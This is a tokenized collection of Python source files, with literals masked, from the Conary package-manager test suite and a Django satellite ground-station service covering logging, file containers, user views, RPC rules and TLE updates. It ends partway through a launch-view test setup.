assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> def testFmtdLog ( self ) : <EOL> tmpDir = tempfile . mkdtemp ( ) <EOL> try : <EOL> origHandlers = log . fmtLogger . handlers [ : ] <EOL> logPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> log . openFormattedLog ( logPath ) <EOL> log . pushLogDescriptor ( '<STR_LIT:foo>' ) <EOL> self . captureOutput ( log . debug , '<STR_LIT>' ) <EOL> log . pushLogDescriptor ( '<STR_LIT:bar>' ) <EOL> self . captureOutput ( log . info , '<STR_LIT>' ) <EOL> log . popLogDescriptor ( ) <EOL> self . captureOutput ( log . warning , '<STR_LIT>' ) <EOL> log . popLogDescriptor ( ) <EOL> self . captureOutput ( log . error , '<STR_LIT>' ) <EOL> log . pushLogDescriptor ( '<STR_LIT>' ) <EOL> hdlr = [ x for x in log . fmtLogger . handlers if x not in origHandlers ] [ <NUM_LIT:0> ] <EOL> hdlr . close ( ) <EOL> log . fmtLogger . handlers . remove ( hdlr ) <EOL> data = open ( logPath ) . read ( ) . splitlines ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> self . assertEquals ( data [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . assertEquals ( len ( data ) , <NUM_LIT:9> ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> finally : <EOL> util . rmtree ( tmpDir ) <EOL> def testDescriptorPop ( self ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . popDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:bar>' ) <EOL> self . hdlr . popDescriptor ( '<STR_LIT:bar>' ) <EOL> self . assertRaises ( AssertionError , self . hdlr . popDescriptor , '<STR_LIT:bar>' ) <EOL> def testCompressedLogs ( self ) : <EOL> tmpDir = tempfile . mkdtemp ( ) <EOL> try : <EOL> bz2Path = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> bz2Hdlr = xmllog . XmlHandler ( bz2Path ) <EOL> self . logger . addHandler ( bz2Hdlr ) <EOL> gzPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> gzHdlr = xmllog . XmlHandler ( gzPath ) <EOL> self . logger . addHandler ( gzHdlr ) <EOL> logPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> logHdlr = xmllog . XmlHandler ( logPath ) <EOL> self . logger . addHandler ( logHdlr ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> bz2Hdlr . close ( ) <EOL> gzHdlr . close ( ) <EOL> logHdlr . close ( ) <EOL> self . logger . handlers . remove ( bz2Hdlr ) <EOL> self . logger . handlers . remove ( gzHdlr ) <EOL> self . logger . handlers . remove ( logHdlr ) <EOL> logData = open ( logPath ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> gzData = gzip . GzipFile ( gzPath , '<STR_LIT:r>' ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> bzData = bz2 . BZ2File ( bz2Path , '<STR_LIT:r>' ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> self . assertFalse ( not logData , "<STR_LIT>" ) <EOL> self . assertEquals ( logData , gzData ) <EOL> self . assertEquals ( logData , bzData ) <EOL> finally : <EOL> util . rmtree ( tmpDir ) <EOL> def testCloseData ( self ) : <EOL> self . hdlr . addRecordData ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> data = open ( self . logfile ) . read ( ) . splitlines ( ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> def testEscapedNewlines ( self ) : <EOL> self . logger . info ( '<STR_LIT>' ) <EOL> data = self . getLogData ( ) <EOL> lastline = data . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> self . assertFalse ( not lastline . startswith ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) </s>
<s> import os <EOL> import gzip <EOL> import tempfile <EOL> import unittest <EOL> from conary . lib import util <EOL> from conary . repository import filecontainer <EOL> from conary . repository . filecontainer import FileContainer <EOL> from conary . repository . filecontents import FromFile , FromString <EOL> def fileCount ( ) : <EOL> l = os . listdir ( "<STR_LIT>" % os . getpid ( ) ) <EOL> return len ( l ) - <NUM_LIT:1> <EOL> def checkFiles ( c , names , data , tags ) : <EOL> names = names [ : ] <EOL> i = <NUM_LIT:0> <EOL> rc = c . getNextFile ( ) <EOL> while rc : <EOL> name , tag , f = rc <EOL> assert ( name == names [ <NUM_LIT:0> ] ) <EOL> del names [ <NUM_LIT:0> ] <EOL> s = gzip . GzipFile ( None , "<STR_LIT:r>" , fileobj = f ) . read ( ) <EOL> if s != data [ i ] : <EOL> raise AssertionError , "<STR_LIT>" % names [ i ] <EOL> if tag != tags [ i ] : <EOL> raise AssertionError , "<STR_LIT>" % names [ i ] <EOL> i += <NUM_LIT:1> <EOL> rc = c . getNextFile ( ) <EOL> if names : <EOL> raise AssertionError , "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( names ) <EOL> class FilecontainerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> fd , self . fn = tempfile . mkstemp ( ) <EOL> def test ( self ) : <EOL> count = fileCount ( ) <EOL> f = util . ExtendedFile ( "<STR_LIT>" , "<STR_LIT:r>" , buffering = False ) <EOL> self . assertRaises ( filecontainer . BadContainer , FileContainer , f ) <EOL> f . close ( ) <EOL> if ( count != fileCount ( ) ) : <EOL> raise AssertionError , "<STR_LIT>" % count <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> c . close ( ) <EOL> data = [ ] <EOL> tags = [ ] <EOL> names = [ ] <EOL> c = FileContainer ( f ) <EOL> self . assertRaises ( AssertionError , c . addFile , "<STR_LIT:name>" , <EOL> FromString ( "<STR_LIT:data>" ) , "<STR_LIT>" ) <EOL> c . close ( ) <EOL> os . unlink ( self . fn ) <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:0> ] , FromString ( data [ <NUM_LIT:0> ] ) , tags [ <NUM_LIT:0> ] ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:1> ] , FromString ( data [ <NUM_LIT:1> ] ) , tags [ <NUM_LIT:1> ] ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:2> ] , FromString ( data [ <NUM_LIT:2> ] ) , tags [ <NUM_LIT:2> ] ) <EOL> c . close ( ) <EOL> c = FileContainer ( f ) <EOL> checkFiles ( c , names , data , tags ) <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> checkFiles ( c , names , data , tags ) <EOL> c . reset ( ) <EOL> checkFiles ( c , names , data , tags ) <EOL> c . close ( ) <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> assert ( name == names [ <NUM_LIT:0> ] ) <EOL> def testLargeFiles ( self ) : <EOL> class SparseFile ( util . ExtendedFile ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . needsWrite = False <EOL> util . ExtendedFile . __init__ ( self , * args , ** kwargs ) <EOL> def write ( self , s ) : <EOL> if len ( s ) > <NUM_LIT:100> and s [ <NUM_LIT:0> ] == '<STR_LIT>' and s [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> self . seek ( len ( s ) - <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . needsWrite = True <EOL> return len ( s ) <EOL> return util . ExtendedFile . write ( self , s ) <EOL> def close ( self ) : <EOL> if self . needsWrite : <EOL> self . write ( '<STR_LIT>' ) <EOL> self . needsWrite = False <EOL> def seek ( self , * args ) : <EOL> if self . needsWrite : <EOL> self . write ( '<STR_LIT>' ) <EOL> self . needsWrite = False <EOL> return util . ExtendedFile . seek ( self , * args ) <EOL> class FalseFile : <EOL> def __init__ ( self , size ) : <EOL> self . size = size <EOL> self . offset = <NUM_LIT:0> <EOL> def seek ( self , offset , whence = <NUM_LIT:0> ) : <EOL> assert ( whence == <NUM_LIT:0> ) <EOL> self . offset = offset <EOL> def read ( self , bytes ) : <EOL> self . offset += bytes <EOL> if self . offset > self . size : <EOL> self . offset -= bytes <EOL> bytes = self . size - self . offset <EOL> self . offset = self . size <EOL> return "<STR_LIT>" * bytes <EOL> f = SparseFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> totalSize = <NUM_LIT> <EOL> c . addFile ( '<STR_LIT:test>' , FromFile ( FalseFile ( totalSize ) ) , '<STR_LIT>' , <EOL> precompressed = True ) <EOL> c . addFile ( '<STR_LIT:end>' , FromString ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> precompressed = True ) <EOL> c . close ( ) <EOL> c = FileContainer ( util . ExtendedFile ( self . fn , '<STR_LIT:r>' , buffering = False ) ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> storedSize = f . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert ( storedSize == totalSize ) <EOL> assert ( tag == '<STR_LIT>' ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> assert ( name == '<STR_LIT:end>' ) <EOL> assert ( tag == '<STR_LIT>' ) <EOL> s = f . read ( ) <EOL> assert ( s == '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> os . unlink ( self . fn ) </s>
<s> from testrunner import testhelp <EOL> import os <EOL> import grp , pwd <EOL> from conary_test import rephelp <EOL> from conary_test . rephelp import RegularFile as RegF <EOL> class SharedFileTest ( rephelp . RepositoryHelper ) : <EOL> def owners ( self , path ) : <EOL> db = self . openDatabase ( ) <EOL> return set ( x [ <NUM_LIT:0> : <NUM_LIT:3> ] for x in db . iterFindPathReferences ( <EOL> path , justPresent = True ) ) <EOL> def checkOwners ( self , path , troves ) : <EOL> assert ( self . owners ( path ) == <EOL> set ( x . getNameVersionFlavor ( ) for x in troves ) ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testBasicSharedFiles ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> baz1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> foo2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:1> ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:0> ) <EOL> assert ( not os . path . exists ( self . rootDir + '<STR_LIT>' ) ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . updatePkg ( '<STR_LIT>' , keepExisting = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , baz1 , foo1 ] ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo2 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:2> ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , baz1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:1> ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:0> ) <EOL> assert ( not os . path . exists ( self . rootDir + '<STR_LIT>' ) ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedUpdate ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> foo2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> bar2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo2 , bar2 ] ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:2>' ) <EOL> self . rollback ( <NUM_LIT:1> ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 , bar1 ] ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedErasures ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 , bar1 ] ) <EOL> self . erasePkg ( self . rootDir , '<STR_LIT>' ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 ] ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedHardLinks ( self ) : <EOL> info = { <EOL> '<STR_LIT:user>' : pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : grp . getgrgid ( os . getgid ( ) ) [ <NUM_LIT:0> ] , <EOL> } <EOL> foo = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' , <EOL> fileContents = [ <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:1>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> , owner = info [ '<STR_LIT:user>' ] , <EOL> group = info [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:2>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> ) ) , <EOL> ] <EOL> ) <EOL> bar = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' , <EOL> fileContents = [ <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:1>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> , owner = info [ '<STR_LIT:user>' ] , <EOL> group = info [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:2>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> ) ) , <EOL> ] <EOL> ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , keepExisting = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> groupRecipe = r"""<STR_LIT>""" <EOL> built , d = self . buildRecipe ( groupRecipe , "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testSharedIntialContents ( self ) : <EOL> foo = self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' , initialContents = True ) ) ] ) <EOL> bar = self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , initialContents = True ) ) ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] , justDatabase = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> groupRecipe = r"""<STR_LIT>""" <EOL> built , d = self . buildRecipe ( groupRecipe , "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testSharedFileDifferentContentTypes ( self ) : <EOL> info = { <EOL> '<STR_LIT>' : pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : grp . getgrgid ( os . getgid ( ) ) [ <NUM_LIT:0> ] , <EOL> } <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testDoubleReplaceFiles ( self ) : <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' ) ) ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> filters = ( '<STR_LIT>' , ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> follows = ( '<STR_LIT>' , ) <EOL> precedes = ( '<STR_LIT:data>' , ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from services . accounts import decorators as account_decorators <EOL> from django . contrib . auth import models as auth_models <EOL> from django . contrib . sites import models as site_models <EOL> from django . forms import models as form_models <EOL> from django . shortcuts import get_object_or_404 <EOL> import logging <EOL> import json <EOL> from jsonview import decorators , exceptions <EOL> from services . accounts import models , utils <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> @ decorators . json_view <EOL> @ account_decorators . login_required <EOL> def user_details ( request ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( __name__ + '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in request . GET : <EOL> raise exceptions . BadRequest ( "<STR_LIT>" ) <EOL> user_id = request . GET [ '<STR_LIT>' ] <EOL> logger . info ( __name__ + '<STR_LIT>' + user_id ) <EOL> user = get_object_or_404 ( models . UserProfile , pk = user_id ) <EOL> fields = [ '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ] <EOL> user_dict = form_models . model_to_dict ( user , fields ) <EOL> user_dict [ '<STR_LIT>' ] = str ( user . country . name ) <EOL> return user_dict <EOL> @ decorators . json_view <EOL> @ account_decorators . login_required <EOL> def user_verification ( request ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( __name__ + '<STR_LIT>' ) <EOL> for x in request . POST : <EOL> print ( ( x , '<STR_LIT::>' , request . POST [ x ] ) ) <EOL> if '<STR_LIT>' not in request . POST : <EOL> print ( ( __name__ + '<STR_LIT>' ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> value = str ( request . POST [ '<STR_LIT>' ] ) <EOL> user_list = json . loads ( value ) <EOL> if site_models . Site . _meta . installed : <EOL> site = site_models . Site . objects . get_current ( ) <EOL> else : <EOL> site = site_models . RequestSite ( request ) <EOL> v_users = [ ] <EOL> for user_id in user_list : <EOL> utils . allauth_confirm_email ( <EOL> auth_models . User . objects . get ( pk = user_id ) , request <EOL> ) <EOL> u_profile = get_object_or_404 ( models . UserProfile , pk = user_id ) <EOL> u_profile . save ( ) <EOL> v_users . append ( user_id ) <EOL> j_v_users = json . dumps ( v_users ) <EOL> result = dict ( user_list = j_v_users ) <EOL> print ( ( __name__ + '<STR_LIT>' + j_v_users ) ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from django . test import TestCase <EOL> from services . common import pusher as satnet_pusher <EOL> class TestPusher ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> self . __push_service = satnet_pusher . PushService ( ) <EOL> self . __ch_name = '<STR_LIT>' <EOL> self . __ev_name = '<STR_LIT>' <EOL> self . __ev_data = { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } <EOL> def test_basic ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __push_service . test_service ( ) <EOL> def test_connection ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __push_service . trigger_event ( <EOL> self . __ch_name , self . __ev_name , self . __ev_data <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import rpc4django <EOL> from services . configuration . models import rules as rule_models <EOL> from services . configuration . models import segments as segment_models <EOL> from services . configuration . jrpc . serializers import rules as rule_serializers <EOL> from website import settings as satnet_settings <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def list_channel_rules ( groundstation_id ) : <EOL> """<STR_LIT>""" <EOL> return rule_serializers . serialize_rules ( <EOL> rule_models . AvailabilityRule . objects . filter ( <EOL> groundstation = segment_models . GroundStation . objects . get ( <EOL> identifier = groundstation_id <EOL> ) <EOL> ) <EOL> ) <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def add_rule ( groundstation_id , rule_cfg ) : <EOL> """<STR_LIT>""" <EOL> op , periodicity , dates = rule_serializers . deserialize_rule_cfg ( rule_cfg ) <EOL> rule = rule_models . AvailabilityRule . objects . create ( <EOL> segment_models . GroundStation . objects . get ( identifier = groundstation_id ) , <EOL> op , periodicity , dates <EOL> ) <EOL> return rule . pk <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def remove_rule ( groundstation_id , rule_id ) : <EOL> """<STR_LIT>""" <EOL> rule_models . AvailabilityRule . objects . get ( <EOL> pk = rule_id , <EOL> groundstation = segment_models . GroundStation . objects . get ( <EOL> identifier = groundstation_id <EOL> ) <EOL> ) . delete ( ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> from periodically import decorators <EOL> from services . configuration . models import tle as tle_models <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> @ decorators . daily ( ) <EOL> def update_tle_database ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> tle_models . TwoLineElementsManager . load_celestrak ( ) <EOL> logger . info ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import datetime <EOL> import difflib <EOL> import logging <EOL> import pytz <EOL> from django import test <EOL> from django . core import exceptions as django_ex <EOL> from services . common import misc , helpers as db_tools <EOL> from services . configuration . models import tle as tle_models <EOL> from services . leop import utils as launch_utils <EOL> from services . leop . jrpc . serializers import launch as launch_serial <EOL> from services . leop . jrpc . serializers import messages as messages_serial <EOL> from services . leop . jrpc . views import launch as launch_jrpc <EOL> from services . leop . jrpc . views import messages as messages_jrpc <EOL> from services . leop . models import launch as launch_models <EOL> from services . simulation . models import groundtracks as simulation_models <EOL> from website import settings as satnet_settings <EOL> class TestLaunchViews ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> satnet_settings . JRPC_PERMISSIONS = True <EOL> self . __user = db_tools . create_user_profile ( ) <EOL> self . __request_1 = db_tools . create_request ( user_profile = self . __user ) <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_1_id <EOL> ) <EOL> self . __gs_2_id = '<STR_LIT>' <EOL> self . __gs_2 = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_2_id <EOL> ) <EOL> self . __admin = db_tools . create_user_profile ( <EOL> username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> is_staff = True <EOL> ) <EOL> self . __request_2 = db_tools . create_request ( user_profile = self . __admin ) <EOL> self . __leop_tle_l1 = db_tools . ISS_TLE [ <NUM_LIT:0> ] <EOL> self . __leop_tle_l2 = db_tools . ISS_TLE [ <NUM_LIT:1> ] <EOL> self . __leop_id = '<STR_LIT>' <EOL> self . __leop_date = pytz . utc . localize ( datetime . datetime . today ( ) ) <EOL> self . __leop = db_tools . create_launch ( <EOL> admin = self . __admin , identifier = self . __leop_id , <EOL> date = self . __leop_date , <EOL> tle_l1 = self . __leop_tle_l1 , tle_l2 = self . __leop_tle_l2 <EOL> ) <EOL> self . __leop_serial_date = str ( self . __leop . date . isoformat ( ) ) <EOL> self . __leop_cs = launch_utils . generate_cluster_callsign ( self . __leop_id ) <EOL> self . __leop_sc_id = launch_utils . generate_cluster_sc_identifier ( <EOL> self . __leop_id , self . __leop_cs <EOL> ) <EOL> self . __ufo_id = <NUM_LIT:1> <EOL> self . __ufo_sc_id = launch_utils . generate_object_sc_identifier ( <EOL> self . __leop_id , self . __ufo_id <EOL> ) <EOL> self . __ufo_callsign = '<STR_LIT>' <EOL> self . __ufo_tle_l1 = self . __leop_tle_l1 <EOL> self . 